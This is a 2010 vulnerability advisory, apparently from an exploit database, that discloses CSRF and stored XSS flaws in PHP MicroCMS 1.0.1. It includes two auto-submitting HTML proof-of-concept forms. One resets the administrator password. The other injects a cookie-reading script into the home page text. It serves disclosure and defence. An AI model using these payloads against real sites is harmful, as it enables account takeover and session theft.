CSRF and XSS in PHP MicroCMS

vendor:

PHP MicroCMS

by:

High-Tech Bridge SA - Ethical Hacking & Penetration Testing

3,3

CVSS

LOW

Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS)

352, 79

CWE

Product Name: PHP MicroCMS

Affected Version From: 1.0.1

Affected Version To: Prior versions

Patch Exists: NO

Related CWE: N/A

CPE: a:apphp:php_microcms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

CSRF and XSS in PHP MicroCMS

The vulnerability exists due to failure in the 'index.php?admin=my_account' script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability and change administrator password. The vulnerability also exists due to failure in the 'index.php?admin=static_pages_edit&pk=home' script to properly sanitize user-supplied input in 'page_text' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. The application should also use a secure flag in the cookie to prevent the cookie from being sent in the clear over an unencrypted channel.

Source

Exploit-DB raw data:

Vulnerability ID: HTB22765
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_php_microcms.html
Product: PHP MicroCMS
Vendor: ApPHP ( http://www.apphp.com/ )
Vulnerable Version: 1.0.1 and probably prior versions
Vendor Notification: 21 December 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "index.php?admin=my_account" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability and change administrator password. The following PoC is available:

<form action="http://host/index.php?admin=my_account" method="post">
<input type="hidden" name="password_one" value="newpass">
<input type="hidden" name="password_two" value="newpass">
<input type="submit" id="btn" name="submit" value="Change Password">
</form>
<script>
document.getElementById('btn').click();
</script>

XSS:
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "index.php?admin=static_pages_edit&pk=home" script to properly sanitize user-supplied input in "page_text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/index.php?admin=static_pages_edit&pk=home" method="post" name="main">
<input type="hidden" name="pk" value="home">
<input type="hidden" name="page_title" value="Welcome to PHP MicroCMS">
<input type="hidden" name="page_text" value="text<script>alert(document.cookie)</script>">
<input type="hidden" name="subSavePage" value="Save Changes">
</form>
<script>
document.main.submit();
</script>